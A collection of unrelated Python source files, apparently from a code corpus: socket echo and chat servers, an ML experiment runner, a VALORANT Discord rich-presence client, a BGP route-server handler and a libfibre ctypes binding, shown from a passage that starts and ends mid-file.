self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setblocking(False)
self.server.bind(('0.0.0.0', 8000))
self.server.listen(1)
async def start_new_socket(self, sock, addr):
try:
while True:
data = str(sock.recv(1024), encoding="utf8")
if 'close' in data:
sock.send(b'close')
break
print('收到客户端发来的数据:{}'.format(data))
deal_data = data.upper()
sock.send(deal_data.encode('utf8'))
print('正常断开{}'.format(threading.currentThread()))
sock.close()
except ConnectionResetError:
print('断开连接')
pass
def start_loop(self,loop):
asyncio.set_event_loop(loop)
loop.run_forever()
def server_sock(self):
print("开始监听")
if 'Win' in str(platform.architecture()):
loop = asyncio.ProactorEventLoop()
else:
import uvloop
loop = uvloop.new_event_loop()
threading.Thread(target=self.start_loop, args=(loop,)).start()
while True:
sock, addr = self.server.accept()
print('开始建立连接')
asyncio.run_coroutine_threadsafe(self.start_new_socket(sock, addr), loop)
if __name__ == '__main__':
server = Server()
server.server_sock() |
main.py | # Copyright 2019 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Main file for running experiments..
"""
import importlib
import os
import subprocess
from mtl.config.opts import parser
import numpy as np
import torch
import torch.multiprocessing as mp
from tqdm import tqdm
def train(opt):
"""Run standard network training loop.
Args:
opt: All experiment and training options (see mtl/config/opts).
"""
if opt.fixed_seed:
print('Fixing random seed')
np.random.seed(9999)
torch.manual_seed(9999)
torch.cuda.manual_seed(9999)
torch.backends.cudnn.deterministic = True
ds = importlib.import_module('mtl.util.datasets.' + opt.dataset)
ds, dataloaders = ds.initialize(opt)
task = importlib.import_module('mtl.train.' + opt.task)
sess = task.Task(opt, ds, dataloaders)
sess.cuda()
splits = [s for s in ['train', 'valid'] if opt.iters[s] > 0]
start_round = opt.last_round - opt.num_rounds
# Main training loop
for round_idx in range(start_round, opt.last_round):
sess.valid_accuracy_track = [[] for _ in range(sess.num_tasks)]
for split in splits:
print('Round %d: %s' % (round_idx, split))
train_flag = split == 'train'
sess.set_train_mode(train_flag)
if split == 'valid':
sess.prediction_ref = [{} for _ in range(sess.num_tasks)]
for step in tqdm(range(opt.iters[split]), ascii=True):
global_step = step + round_idx * opt.iters[split]
sess.run(split, global_step)
if train_flag: sess.update_weights()
if (split == 'train' and opt.drop_learning_rate
and global_step in opt.drop_learning_rate):
opt.learning_rate /= opt.drop_lr_factor
print('Dropping learning rate to %.2f' % opt.learning_rate)
for opt_key in sess.checkpoint_ref['optim']:
for p in sess.__dict__[opt_key].param_groups:
p['lr'] = opt.learning_rate
# Update Tensorboard
if global_step % 500 == 0 or (split == 'valid' and global_step % 50):
for i in range(len(ds[split])):
sess.tb.update(ds[split][i].task_name, split, global_step,
sess.get_log_vals(split, i))
torch.save({'preds': sess.prediction_ref},
'%s/final_predictions' % opt.exp_dir)
# Update accuracy history
sess.score = np.array([np.array(a).mean()
for a in sess.valid_accuracy_track]).mean()
print('Score:', sess.score)
for i in range(sess.num_tasks):
for s in splits:
if s == 'valid':
tmp_acc = np.array(sess.valid_accuracy_track[i]).mean()
sess.log['accuracy'][i][s] = tmp_acc
sess.log['accuracy_history'][i][s] += [sess.log['accuracy'][i][s]]
sess.save(opt.exp_dir + '/snapshot')
with open(opt.exp_dir + '/last_round', 'w') as f:
f.write('%d\n' % (round_idx + 1))
if (opt.iters['valid'] > 0 and sess.score < opt.early_stop_thr):
break
def worker(opt, p_idx, cmd_queue, result_queue, debug_param):
"""Worker thread for managing parallel experiment runs.
Args:
opt: Experiment options
p_idx: Process index
cmd_queue: Queue holding experiment commands to run
result_queue: Queue to submit experiment results
debug_param: Shared target for debugging meta-optimization
"""
gpus = list(map(int, opt.gpu_choice.split(',')))
gpu_choice = gpus[p_idx % len(gpus)]
np.random.seed()
try:
while True:
msg = cmd_queue.get()
if msg == 'DONE': break
exp_count, mode, cmd, extra_args = msg
if mode == 'debug':
# Basic operation for debugging/sanity checking optimizers
exp_id, param = cmd
pred_param = param['partition'][0]
triu_ = torch.Tensor(np.triu(np.ones(debug_param.shape)))
score = -np.linalg.norm((debug_param - pred_param)*triu_)
score += np.random.randn() * opt.meta_eval_noise
tmp_acc = {'accuracy': [{'valid': score} for i in range(10)]}
result = {'score': score, 'log': tmp_acc}
elif mode == 'cmd':
# Run a specified command
tmp_cmd = cmd
if opt.distribute:
tmp_cmd += ['--gpu_choice', str(gpu_choice)]
tmp_cmd += extra_args
exp_id = tmp_cmd[tmp_cmd.index('-e') + 1]
print('%d:' % p_idx, ' '.join(tmp_cmd))
subprocess.call(tmp_cmd)
# Collect result
log_path = '%s/%s/snapshot_extra' % (opt.exp_root_dir, exp_id)
try:
result = torch.load(log_path)
except Exception as e:
print('Error loading result:', repr(e))
result = None
if opt.cleanup_experiment:
# Remove extraneous files that take up disk space
exp_dir = '%s/%s' % (opt.exp_root_dir, exp_id)
cleanup_paths = [exp_dir + '/snapshot_optim',
exp_dir + '/snapshot_model']
dir_files = os.listdir(exp_dir)
tfevent_files = ['%s/%s' % (exp_dir, fn)
for fn in dir_files if 'events' in fn]
cleanup_paths += tfevent_files
for cleanup in cleanup_paths:
subprocess.call(['rm', cleanup])
result_queue.put([exp_id, result, exp_count])
except KeyboardInterrupt:
print('Keyboard interrupt in process %d' % p_idx)
finally:
print('Exiting process %d' % p_idx)
def main():
# Parse command line options
opt = parser.parse_command_line()
# Set GPU
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu_choice
if opt.is_meta:
# Initialize queues
cmd_queue = mp.Queue()
result_queue = mp.Queue()
# Set up target debug params
debug_param = torch.rand(2, 10, 10)
# Start workers
workers = []
for i in range(opt.num_procs):
worker_args = (opt, i, cmd_queue, result_queue, debug_param)
worker_p = mp.Process(target=worker, args=worker_args)
worker_p.daemon = True
worker_p.start()
workers += [worker_p]
# Initialize and run meta optimizer
metaoptim = importlib.import_module('mtl.meta.optim.' + opt.metaoptimizer)
metaoptim = metaoptim.MetaOptimizer(opt)
metaoptim.run(cmd_queue, result_queue)
# Clean up workers
for i in range(opt.num_procs):
cmd_queue.put('DONE')
for worker_p in workers:
worker_p.join()
else:
# Run standard network training
train(opt)
if __name__ == '__main__':
main()
|
server.py | import socket
from threading import *
import time
#Vector of clients
clients = []
#Detect an local ip adress
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#Set the connection variables
ip = get_ip()
port = 1234
#Server object
server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#Bind the selected port to this process
server_socket.bind( (ip,port) )
#Accept packets
server_socket.listen(5)
print("Server %s is running on port %s..." % (ip,str(port)))
#Send message to all clients except the sender
def broadcast(message):
for client in clients:
client.sendall(message.encode('utf-8'))
#Manage of data that comes to the server
def serviClient(client_socket):
name = client_socket.recv(100).decode('utf_8')
broadcast("<< %s entered the chat room! >>" % (name))
print("<< %s entered the chat room! >>" % (name))
while True:
message = client_socket.recv(100).decode('utf_8')
if message == 'exit()':
clients.remove(client_socket)
broadcast("<< %s left the chat room! >>" % (name))
print("<< %s left the chat room! >>" % (name))
break
else:
broadcast("%s: %s" % (name, message))
print("%s: %s" % (name, message))
time.sleep(1)
client_socket.close()
#Accepting new client
while True:
client_socket,client_ip = server_socket.accept()
if client_socket:
clients.append(client_socket)
Thread(target = serviClient, args = (client_socket,)).start()
|
main.py | print("""
[VALORANT-RPC] by restrafes
The source code for this project can be found at: https://github.com/restrafes/valorant-rpc
""")
# import libraries
import os, sys, psutil, traceback
import asyncio, threading
import pypresence, time
import json
from psutil import AccessDenied
from utils import open_game_client, get_lockfile, get_session, get_presence, get_game_presence, parse_time, to_map_name
from exception import RiotAuthError, RiotRefuseError
import pystray, ctypes
from pystray import Icon as icon, Menu as menu, MenuItem as item
from PIL import Image, ImageDraw
from tkinter import Tk, PhotoImage, messagebox
if __name__ == "__main__":
# load configuration
global config, rpc, systray, systray_thread
# window for messageboxes (and maybe other things in the future???)
tkinter_window = Tk()
tkinter_window.iconphoto(False, PhotoImage(file="resources/favicon.png"))
tkinter_window.withdraw() # hide root window
try:
# open config
with open("config.json", "r") as config_file:
config = json.load(config_file)
config_file.close()
# main exit process method
def exit_program():
global systray, rpc
rpc.close()
systray.stop()
sys.exit() # close the process
# hide the console window if debug is off
window_shown = config["debug"]
kernel32, user32 = ctypes.WinDLL('kernel32'), ctypes.WinDLL('user32')
if not config["debug"]:
try:
hWnd = kernel32.GetConsoleWindow()
user32.ShowWindow(hWnd, 0)
except:
pass
# console visibility toggle functionality
def tray_window_toggle(icon, item):
try:
global window_shown
window_shown = not item.checked
hWnd = kernel32.GetConsoleWindow()
user32.ShowWindow(hWnd, window_shown)
except:
pass
def run_systray():
global systray, window_shown
systray_menu = menu(
item('VALORANT-RPC by restrafes', tray_window_toggle, enabled=False),
item('Show Debug Window', tray_window_toggle, checked=lambda item: window_shown),
item('Quit', exit_program)
)
systray = pystray.Icon("VALORANT RPC", Image.open("resources/favicon.ico"), "VALORANT RPC", systray_menu)
systray.run()
def is_process_running(required_processes=["VALORANT-Win64-Shipping.exe", "RiotClientServices.exe"]):
processes = []
for proc in psutil.process_iter():
try:
processes.append(proc.name())
except (PermissionError, AccessDenied):
pass # some processes are higher than user-level and cannot have its attributes accessed
for process in required_processes:
if process in processes:
return True
return False
# discord rpc implementation
rpc, rpc_state = pypresence.Presence(client_id=str(config["client_id"])), None
rpc_menu_default = {"large_image": "valorant-logo", "large_text": "VALORANT®"}
rpc_gamemode_equivalents = config["rpc_gamemode_equivalents"]
def rpc_update(**kwargs): # only interacts with the RPC api if the requested state is different than its current state
global rpc, rpc_state
if kwargs != rpc_state:
print(kwargs)
rpc.update(**kwargs)
rpc_state = kwargs
# if this is a clean run, start valorant and wait for authentication
if not is_process_running():
print("VALORANT not running, launching Riot Client...")
open_game_client()
while not is_process_running():
time.sleep(1)
# connect rpc
rpc.connect()
# create a thread for systray
systray_thread = threading.Thread(target=run_systray)
systray_thread.start()
# yield for the lockfile containing all necessary credentials for the local riot api
lockfile, lockfile_wait_cycles = None, 0
while (config["fetch_timeout"] <= lockfile_wait_cycles or config["fetch_timeout"] < 0) and lockfile is None and is_process_running():
print(f"Waiting for LOCKFILE data... (Cycle #{lockfile_wait_cycles})")
lockfile_wait_cycles += 1
try:
lockfile = get_lockfile()
except:
pass
if lockfile is None: # close the program if a timeout is set and reached and no lockfile is detected
print("LOCKFILE fetching timeout exceeded, exiting script...")
exit_program()
print(f"LOCKFILE: {lockfile}")
# yield for session data from the local riot api
session, session_wait_cycles = None, 0
while (config["fetch_timeout"] <= session_wait_cycles or config["fetch_timeout"] < 0) and session is None and is_process_running():
print(f"Waiting for game session data... (Cycle #{session_wait_cycles})")
session_wait_cycles += 1
try:
session = get_session(lockfile, config)
except RiotAuthError:
print("Logged out response received, continue to yield...")
except RiotRefuseError:
print("Error 403 received, exiting script...")
session = None
exit_program()
time.sleep(1)
if session is None: # close the program if a timeout is set and reached and no session is detected
print("Game session fetch timeout exceeded or client no longer running, exiting script...")
exit_program()
print(f"Session: {session}")
# main script
while is_process_running():
time.sleep(config["update_interval"])
network_presence = get_presence(lockfile, session, config)
if network_presence:
game_presence = get_game_presence(network_presence)
if network_presence["state"] == "away": # if the game is idle on the menu screen
get_state = "In a Party" if game_presence["partySize"] > 1 else "Solo"
rpc_update(
**rpc_menu_default,
details = "Away",
party_size = [game_presence["partySize"], game_presence["maxPartySize"]],
state = get_state,
small_image = "away",
small_text = "Away"
)
else: # if the player is in the lobby or in-game
if game_presence["sessionLoopState"] == "MENUS": # if the player is on the menu screem
get_state = ""
get_start = None
if game_presence["partyState"] == "MATCHMAKING":
get_state = "In Queue"
get_start = parse_time(game_presence["queueEntryTime"])
else:
get_state = "In a Party" if game_presence["partySize"] > 1 else "Solo"
rpc_update(
**rpc_menu_default,
details = (rpc_gamemode_equivalents[game_presence["queueId"]] if game_presence["queueId"] in rpc_gamemode_equivalents else "Discovery") + " (Lobby)",
party_size = [game_presence["partySize"], game_presence["maxPartySize"]],
state = get_state,
start = get_start
)
elif game_presence["sessionLoopState"] in ["INGAME", "PREGAME"]: # if the player is on the agent select screen or in a round
match_type = (rpc_gamemode_equivalents[game_presence["queueId"]] if game_presence["queueId"] in rpc_gamemode_equivalents else "Discovery")
get_start = game_presence["partyVersion"]
get_state = ""
if game_presence["sessionLoopState"] == "INGAME":
get_state = "In a Party" if game_presence["partySize"] > 1 else "Solo"
elif game_presence["sessionLoopState"] == "PREGAME":
get_state = "Agent Select"
rpc_update(
details = f"{match_type}: {game_presence['partyOwnerMatchScoreAllyTeam']} - {game_presence['partyOwnerMatchScoreEnemyTeam']}",
party_size = [game_presence["partySize"], game_presence["maxPartySize"]],
state = get_state,
start = get_start,
large_image = f"{to_map_name(config, game_presence['matchMap'], True).lower()}-splash",
large_text = f"{to_map_name(config, game_presence['matchMap'])}",
small_image = f"{match_type.lower()}-icon",
small_text = f"{match_type}"
)
else:
print("Could not fetch presence from the local server, the client process may have ended or it may take a little more time to start")
print("The game process is no longer running, exiting script...")
exit_program()
except RuntimeError:
pass # don't error out when the event loop is closed
except Exception as program_exception:
print(f"THERE WAS AN ERROR WHILE RUNNING THE PROGRAM: {program_exception}")
messagebox.showerror(title="VALORANT RPC by restrafes", message=f"There was a problem while running the program:\n{traceback.format_exc()}")
finally:
sys.exit() |
prio_handler_rs1.py | '''
receives BGP messages and assign them to the set of SMPC workers
'''
import argparse
import json
from multiprocessing.connection import Listener, Client
import os
import Queue
from threading import Thread
import sys
np = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if np not in sys.path:
sys.path.append(np)
import util.log
from server_pprs import server as Server
import random
import os
import pickle
import subprocess
from time import sleep
import time
import multiprocessing as mp
from multiprocessing import Process, Manager
import prio_worker_rs1
from load_ribs import load_ribs
from Queue import Empty
import threading
import port_config
from Queue import Queue, PriorityQueue
import sys
logger = util.log.getLogger('prio-handler-rs1')
RS1_MODE = 1
class PrioHandlerRs1:
def __init__(self, asn_2_id_file, rib_file, number_of_processes):
logger.info("Initializing the Priority Handler for RS1.")
self.number_of_processes = number_of_processes
with open(asn_2_id_file, 'r') as f:
self.asn_2_id = json.load(f)
self.prefix_2_nh_id_2_route = load_ribs(rib_file, self.asn_2_id, RS1_MODE) if rib_file else {}
# Initialize a XRS Server
self.server_receive_bgp_messages = Server(logger, endpoint=(port_config.process_assignement["rs1"], port_config.ports_assignment["rs1_receive_bgp_messages"]), authkey=None)
# NOTE: fake sending, only for performance test
#self.server_send_mpc_output = Server(logger, endpoint=(port_config.process_assignement["rs1"], port_config.ports_assignment["rs1_send_mpc_output"]),authkey=None)
self.rs1_to_rs2_client = Client((port_config.process_assignement["rs2"], port_config.ports_assignment["rs1_rs2"]), authkey=None)
logger.debug("connected to rs2")
self.run = True
self.lock = mp.Manager().Lock()
#self.lock_stop = mp.Manager().Lock()
#self.lock_stop.acquire()
#self.stop_received=False
# create workers
self.manager = Manager()
self.handler_to_worker_queue = self.manager.Queue() # it should be a priority queue
self.worker_to_handler_queue = self.manager.Queue()
self.worker_ids_queue = self.manager.Queue()
map(self.worker_ids_queue.put,range(port_config.ports_assignment["worker_port"],port_config.ports_assignment["worker_port"]+self.number_of_processes))
self.prefix_2_messages_queued = {}
self.prefixes_under_processing = set()
self.workers_pool = mp.Pool(self.number_of_processes, prio_worker_rs1.prio_worker_main,(self.handler_to_worker_queue,self.worker_to_handler_queue,self.worker_ids_queue,))
def start(self):
self.receive_bgp_routes_th = Thread(target=self.receive_bgp_routes)
self.receive_bgp_routes_th.setName("self.receive_bgp_routes_th")
self.receive_bgp_routes_th.start()
self.receive_from_workers()
def receive_from_workers(self):
waiting = 0
stop_counter=self.number_of_processes
while True:
try:
msg = self.worker_to_handler_queue.get(True, 1)
if "stop" in msg:
logger.info("received STOP message from worker")
stop_counter -= 1
print "stop received " + str(stop_counter)
self.rs1_to_rs2_client.send(pickle.dumps(msg))
if stop_counter == 0:
# NOTE: fake sending, only for performance test
#self.server_send_mpc_output.sender_queue.put(pickle.dumps(msg))
time.sleep(5)
break
continue
if msg["type"] == "to-rs2" or msg["type"] == "to-rs2-init":
self.rs1_to_rs2_client.send(pickle.dumps(msg))
if msg["type"] == "to-hosts":
# NOTE: fake sending, only for performance test
#self.server_send_mpc_output.sender_queue.put(pickle.dumps(msg))
self.lock.acquire()
if msg["prefix"] in self.prefix_2_messages_queued.keys():
old_msg = self.prefix_2_messages_queued[msg["prefix"]].pop(0)
as_id = self.asn_2_id[old_msg["asn"]]
self.prefix_2_nh_id_2_route[msg["prefix"]][as_id] = {}
self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["announcement_id"] = old_msg["announcement_id"]
self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["key"] = old_msg["key"]
self.handler_to_worker_queue.put((old_msg["announcement_id"], {"prefix" : old_msg["prefix"], "announcement_id" : old_msg["announcement_id"], "encrypted_route" : old_msg["encrypted_route"], "as_id" : as_id, "messages" : self.prefix_2_nh_id_2_route[old_msg["prefix"]]}))
if len(self.prefix_2_messages_queued[old_msg["prefix"]]) == 0:
del self.prefix_2_messages_queued[old_msg["prefix"]]
else:
self.prefixes_under_processing.remove(msg["prefix"])
#if len(self.prefix_2_messages_queued.keys())==0 and self.stop_received:
# self.lock_stop.release() # allow to send the STOP message to the workers
self.lock.release()
except Empty:
if waiting == 0:
waiting = 1
else:
waiting = (waiting % 30) + 1
if waiting == 30:
pass
self.rs1_to_rs2_client.close()
logger.debug("shutting down receive from workers")
def receive_bgp_routes(self):
logger.info("Starting the Server to handle incoming BGP Updates from ExaBGP. Listening on port 6000")
self.server_receive_bgp_messages.start()
logger.info("Connected to ExaBGP via port 6000")
# NOTE: fake sending, only for performance test
#self.server_send_mpc_output.start()
#logger.info("RS1 connected to Host Receiver Mock ")
waiting = 0
while self.run:
# get BGP messages from ExaBGP
try:
msg = self.server_receive_bgp_messages.receiver_queue.get(True, 1)
msg = pickle.loads(msg)
waiting = 0
# Received BGP bgp_update advertisement from ExaBGP
if "stop" in msg:
close_msg = {"stop" : 1}
logger.info("Waiting 20 seconds before sending closing message " + str(close_msg))
print "getting stop lock..."
self.lock.acquire()
self.stop_received=True
self.lock.release()
print "Waiting 20 seconds before sending closing message "
time.sleep(20)
#self.lock_stop.acquire()
logger.info("Sending closing message " + str(close_msg))
print "Sending closing message"
while not self.handler_to_worker_queue.empty():
sleep(1)
for _ in range(0,self.number_of_processes):
self.handler_to_worker_queue.put((sys.maxint,msg))
#self.lock_stop.release()
break
else:
self.lock.acquire()
if msg["prefix"] in self.prefixes_under_processing:
if msg["prefix"] not in self.prefix_2_messages_queued.keys():
self.prefix_2_messages_queued[msg["prefix"]]=[]
self.prefix_2_messages_queued[msg["prefix"]].append(msg)
self.lock.release()
else:
self.lock.release()
if msg["prefix"] not in self.prefix_2_nh_id_2_route.keys():
self.prefix_2_nh_id_2_route[msg["prefix"]]={}
as_id = self.asn_2_id[msg["asn"]]
self.prefix_2_nh_id_2_route[msg["prefix"]][as_id] = {}
self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["announcement_id"] = msg["announcement_id"]
self.prefix_2_nh_id_2_route[msg["prefix"]][as_id]["key"] = msg["key"]
self.handler_to_worker_queue.put((msg["announcement_id"], {"prefix" : msg["prefix"], "announcement_id" : msg["announcement_id"], "encrypted_route" : msg["encrypted_route"], "as_id" : as_id, "messages" : self.prefix_2_nh_id_2_route[msg["prefix"]]}))
self.prefixes_under_processing.add(msg["prefix"])
except Empty:
if waiting == 0:
waiting = 1
else:
waiting = (waiting % 30) + 1
if waiting == 30:
pass
logger.debug("receive_routes_shut_down")
def stop(self):
while True:
try:
self.receive_bgp_routes_th.join(1)
logger.debug("waiting for join receive_bgp_routes")
except KeyboardInterrupt:
self.run=False
logger.info("Stopping.")
self.run = False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("asn_2_id_file", type=str, help="specify asn_2_id json file")
parser.add_argument('-r', '--rib_file', type=str, help='specify the rib file, eg.g. ../examples/test-rs/ribs/bview')
parser.add_argument("-p","--processes", help="number of parallel SMPC processes", type=int, default=1)
args = parser.parse_args()
pprs = PrioHandlerRs1(args.asn_2_id_file, args.rib_file, args.processes)
rs_thread = Thread(target=pprs.start)
rs_thread.setName("PrioHandler1Thread")
rs_thread.daemon = True
rs_thread.start()
while rs_thread.is_alive():
try:
rs_thread.join(1)
#logger.info("waiting for join pprs")
#print "waiting for join pprs"
#logger.debug("join cycle")
except KeyboardInterrupt:
pprs.stop()
print "waiting before dying"
logger.info("waiting before dying")
for thread in threading.enumerate():
print thread.name
if __name__ == '__main__':
main()
|
libfibre.py | #!/bin/python
from ctypes import *
import asyncio
import os
from itertools import count, takewhile
import struct
from types import MethodType
import concurrent
import threading
import time
import platform
from .utils import Logger, Event
import sys
# Enable this for better tracebacks in some cases
#import tracemalloc
#tracemalloc.start(10)
lib_names = {
('Linux', 'x86_64'): 'libfibre-linux-amd64.so',
('Linux', 'armv7l'): 'libfibre-linux-armhf.so',
('Windows', 'AMD64'): 'libfibre-windows-amd64.dll',
('Darwin', 'x86_64'): 'libfibre-macos-x86.dylib'
}
system_desc = (platform.system(), platform.machine())
script_dir = os.path.dirname(os.path.realpath(__file__))
fibre_cpp_paths = [
os.path.join(os.path.dirname(os.path.dirname(script_dir)), "cpp"),
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(script_dir)))), "Firmware", "fibre-cpp")
]
def get_first(lst, predicate, default):
for item in lst:
if predicate(item):
return item
return default
if not system_desc in lib_names:
raise ModuleNotFoundError(("libfibre is not supported on your platform ({} {}). "
"Go to https://github.com/samuelsadok/fibre-cpp/tree/devel for "
"instructions on how to compile libfibre. Once you have compiled it, "
"add it to this folder.").format(*system_desc))
lib_name = lib_names[system_desc]
search_paths = fibre_cpp_paths + [script_dir]
lib_path = get_first(
(os.path.join(p, lib_name) for p in search_paths),
os.path.isfile, None)
if lib_path is None:
raise ModuleNotFoundError("{} was not found in {}".format(lib_name, search_paths))
if os.path.getsize(lib_path) < 1000:
raise ModuleNotFoundError("{} is too small. Did you forget to init git lfs? Try this:\n"
" 1. Install git lfs (https://git-lfs.github.com/)\n"
" 2. Run `cd {}`\n"
" 3. Run `git lfs install`\n"
" 4. Run `git lfs pull`".format(lib_path, os.path.dirname(lib_path)))
if os.name == 'nt':
dll_dir = os.path.dirname(lib_path)
try:
# New way in python 3.8+
os.add_dll_directory(dll_dir)
except:
os.environ['PATH'] = dll_dir + os.pathsep + os.environ['PATH']
lib = windll.LoadLibrary(lib_path)
else:
lib = cdll.LoadLibrary(lib_path)
# libfibre definitions --------------------------------------------------------#
PostSignature = CFUNCTYPE(c_int, CFUNCTYPE(None, c_void_p), POINTER(c_int))
RegisterEventSignature = CFUNCTYPE(c_int, c_int, c_uint32, CFUNCTYPE(None, c_void_p, c_int), POINTER(c_int))
DeregisterEventSignature = CFUNCTYPE(c_int, c_int)
CallLaterSignature = CFUNCTYPE(c_void_p, c_float, CFUNCTYPE(None, c_void_p), POINTER(c_int))
CancelTimerSignature = CFUNCTYPE(c_int, c_void_p)
OnFoundObjectSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p)
OnLostObjectSignature = CFUNCTYPE(None, c_void_p, c_void_p)
OnStoppedSignature = CFUNCTYPE(None, c_void_p, c_int)
OnAttributeAddedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_size_t, c_void_p, c_void_p, c_size_t)
OnAttributeRemovedSignature = CFUNCTYPE(None, c_void_p, c_void_p)
OnFunctionAddedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_void_p, c_size_t, POINTER(c_char_p), POINTER(c_char_p), POINTER(c_char_p), POINTER(c_char_p))
OnFunctionRemovedSignature = CFUNCTYPE(None, c_void_p, c_void_p)
OnCallCompletedSignature = CFUNCTYPE(c_int, c_void_p, c_int, c_void_p, c_void_p, POINTER(c_void_p), POINTER(c_size_t), POINTER(c_void_p), POINTER(c_size_t))
OnTxCompletedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_int, c_void_p)
OnRxCompletedSignature = CFUNCTYPE(None, c_void_p, c_void_p, c_int, c_void_p)
kFibreOk = 0
kFibreBusy = 1
kFibreCancelled = 2
kFibreClosed = 3
kFibreInvalidArgument = 4
kFibreInternalError = 5
kFibreProtocolError = 6
kFibreHostUnreachable = 7
class LibFibreVersion(Structure):
_fields_ = [
("major", c_uint16),
("minor", c_uint16),
("patch", c_uint16),
]
def __repr__(self):
return "{}.{}.{}".format(self.major, self.minor, self.patch)
class LibFibreEventLoop(Structure):
_fields_ = [
("post", PostSignature),
("register_event", RegisterEventSignature),
("deregister_event", DeregisterEventSignature),
("call_later", CallLaterSignature),
("cancel_timer", CancelTimerSignature),
]
libfibre_get_version = lib.libfibre_get_version
libfibre_get_version.argtypes = []
libfibre_get_version.restype = POINTER(LibFibreVersion)
version = libfibre_get_version().contents
if (version.major, version.minor) != (0, 1):
raise Exception("Incompatible libfibre version: {}".format(version))
libfibre_open = lib.libfibre_open
libfibre_open.argtypes = [LibFibreEventLoop]
libfibre_open.restype = c_void_p
libfibre_close = lib.libfibre_close
libfibre_close.argtypes = [c_void_p]
libfibre_close.restype = None
libfibre_open_domain = lib.libfibre_open_domain
libfibre_open_domain.argtypes = [c_void_p, c_char_p, c_size_t]
libfibre_open_domain.restype = c_void_p
libfibre_close_domain = lib.libfibre_close_domain
libfibre_close_domain.argtypes = [c_void_p]
libfibre_close_domain.restype = None
libfibre_start_discovery = lib.libfibre_start_discovery
libfibre_start_discovery.argtypes = [c_void_p, c_void_p, OnFoundObjectSignature, OnLostObjectSignature, OnStoppedSignature, c_void_p]
libfibre_start_discovery.restype = None
libfibre_stop_discovery = lib.libfibre_stop_discovery
libfibre_stop_discovery.argtypes = [c_void_p]
libfibre_stop_discovery.restype = None
libfibre_subscribe_to_interface = lib.libfibre_subscribe_to_interface
libfibre_subscribe_to_interface.argtypes = [c_void_p, OnAttributeAddedSignature, OnAttributeRemovedSignature, OnFunctionAddedSignature, OnFunctionRemovedSignature, c_void_p]
libfibre_subscribe_to_interface.restype = None
libfibre_get_attribute = lib.libfibre_get_attribute
libfibre_get_attribute.argtypes = [c_void_p, c_void_p, POINTER(c_void_p)]
libfibre_get_attribute.restype = c_int
libfibre_call = lib.libfibre_call
libfibre_call.argtypes = [c_void_p, POINTER(c_void_p), c_int, c_void_p, c_size_t, c_void_p, c_size_t, POINTER(c_void_p), POINTER(c_void_p), OnCallCompletedSignature, c_void_p]
libfibre_call.restype = c_int
libfibre_start_tx = lib.libfibre_start_tx
libfibre_start_tx.argtypes = [c_void_p, c_char_p, c_size_t, OnTxCompletedSignature, c_void_p]
libfibre_start_tx.restype = None
libfibre_cancel_tx = lib.libfibre_cancel_tx
libfibre_cancel_tx.argtypes = [c_void_p]
libfibre_cancel_tx.restype = None
libfibre_start_rx = lib.libfibre_start_rx
libfibre_start_rx.argtypes = [c_void_p, c_char_p, c_size_t, OnRxCompletedSignature, c_void_p]
libfibre_start_rx.restype = None
libfibre_cancel_rx = lib.libfibre_cancel_rx
libfibre_cancel_rx.argtypes = [c_void_p]
libfibre_cancel_rx.restype = None
# libfibre wrapper ------------------------------------------------------------#
class ObjectLostError(Exception):
def __init__(self):
super(Exception, self).__init__("the object disappeared")
def _get_exception(status):
if status == kFibreOk:
return None
elif status == kFibreCancelled:
return asyncio.CancelledError()
elif status == kFibreClosed:
return EOFError()
elif status == kFibreInvalidArgument:
return ArgumentError()
elif status == kFibreInternalError:
return Exception("internal libfibre error")
elif status == kFibreProtocolError:
return Exception("peer misbehaving")
elif status == kFibreHostUnreachable:
return ObjectLostError()
else:
return Exception("unknown libfibre error {}".format(status))
class StructCodec():
"""
Generic serializer/deserializer based on struct pack
"""
def __init__(self, struct_format, target_type):
self._struct_format = struct_format
self._target_type = target_type
def get_length(self):
return struct.calcsize(self._struct_format)
def serialize(self, libfibre, value):
value = self._target_type(value)
return struct.pack(self._struct_format, value)
def deserialize(self, libfibre, buffer):
value = struct.unpack(self._struct_format, buffer)
value = value[0] if len(value) == 1 else value
return self._target_type(value)
class ObjectPtrCodec():
"""
Serializer/deserializer for an object reference
libfibre transcodes object references internally from/to something that can
be sent over the wire and understood by the remote instance.
"""
def get_length(self):
return struct.calcsize("P")
def serialize(self, libfibre, value):
if value is None:
return struct.pack("P", 0)
elif isinstance(value, RemoteObject):
return struct.pack("P", value._obj_handle)
else:
raise TypeError("Expected value of type RemoteObject or None but got '{}'. An example for a RemoteObject is this expression: odrv0.axis0.controller._input_pos_property".format(type(value).__name__))
def deserialize(self, libfibre, buffer):
handle = struct.unpack("P", buffer)[0]
return None if handle == 0 else libfibre._objects[handle]
codecs = {
'int8': StructCodec("<b", int),
'uint8': StructCodec("<B", int),
'int16': StructCodec("<h", int),
'uint16': StructCodec("<H", int),
'int32': StructCodec("<i", int),
'uint32': StructCodec("<I", int),
'int64': StructCodec("<q", int),
'uint64': StructCodec("<Q", int),
'bool': StructCodec("<?", bool),
'float': StructCodec("<f", float),
'object_ref': ObjectPtrCodec()
}
def decode_arg_list(arg_names, codec_names):
for i in count(0):
if arg_names[i] is None or codec_names[i] is None:
break
arg_name = arg_names[i].decode('utf-8')
